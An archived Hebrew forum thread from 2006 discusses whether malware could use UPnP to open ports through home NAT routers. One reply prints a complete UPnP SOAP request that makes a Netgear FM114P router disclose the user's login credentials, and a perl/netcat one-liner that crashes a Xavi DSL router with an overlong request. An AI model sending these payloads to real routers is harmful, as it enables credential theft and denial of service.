ארכיון רד-בורד: וירוס עם יכולות UPnP, נתבי NAT כבר לא בטוחים...

ראשי > אבטחת מידע > וירוס עם יכולות UPnP, נתבי NAT כבר לא בטוחים...

17/02/2006 08:29:58 iTK98

רקע, לאלו שלא יודעים מה זה שירות ה UPnP
בנתב שלהם ובמערכת ההפעלה שלהם:

Universal Plug and Plays. ממשק שנועד
לאפשר תקשורות בין תוכניות ומחשבים שונים,
על מנת להקל את השימוש שלהם על המשתמש.
עוד מידע, תחפשו בגוגל upnp faq.
http://www.microsoft.com/technet/prodtechnol/winxppro/support/upnp01.mspx
http://www.smarthomeforum.com/start/faq.asp?ID=22

אז איך זה קשור לנתבים? השירות לא קיים
בכל הנתבים, אבל הוא הוכר לראשונה לפני
קצת יותר משנה, כך שנתבים חדשים (בעיקר)
מגיעים עם האופציה הזאת. השירות מאפשר
לתוכניות לגשת לנתב ולשוחח איתו. בנתבים
בדרך כלל השירות מאפשר לתוכניות לנתב
פורטים לתוך המערכת על מנת לאפשר תפעול
יעיל של התוכנית.

*עד כמה שאני יודע, השירות לא דורש הכנסת
סיסמא ע"מ לאפשר את הניתובים.

עד היום עדיין לא הופיע וירוס שמנצל את
השירות בצורה זאת.

אז מה בסך הכל אפשר לעשות? אם אין לך
צורך בשירות, תבטל אותו (בנתב, אני לא
יודע מה ההשלכות של ביטול השירות
בחלונות).[ההודעה נערכה על-ידי iTK98 ב-17/02/2006 08:41:42]

17/02/2006 12:16:59 antivirus

בהחלט ישנם ניצולים של החור הזה כבר על נתבים ואפילו על ראוטרים
קח לדוגמא את הנתב Netgear FM114P ProSafe
ששליחת המחרוזת הבאה תגרום לו לפלוט את שם המשתמש והסיסמת התחברות שלך לאינטרט
וכל זה על ידי שימוש בשירות ה UPnP

המחזרות:
קוד:POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>

או את הראוטר Xavi DSL
ששליחת מחרוזת ארוכה מידי בפורט 280 ושימוש בשירות ה UPnP בשביל זאת תגרום לו לקרוס
המחרוזת:

קוד:perl -e ’print "GET /"."A"x1008;print "\nHost:www.example.com:280\n\n\n\n\n"’ | netcat -v -n www.example.com 80

17/02/2006 12:55:32 iTK98

יותר התכוונתי לסוסים טרואנים אשר
יאפשרו גישה אליהם דרך נתבי NAT.

19/02/2006 17:17:41 dracula_2000

תודה על המידע

עמודים: 1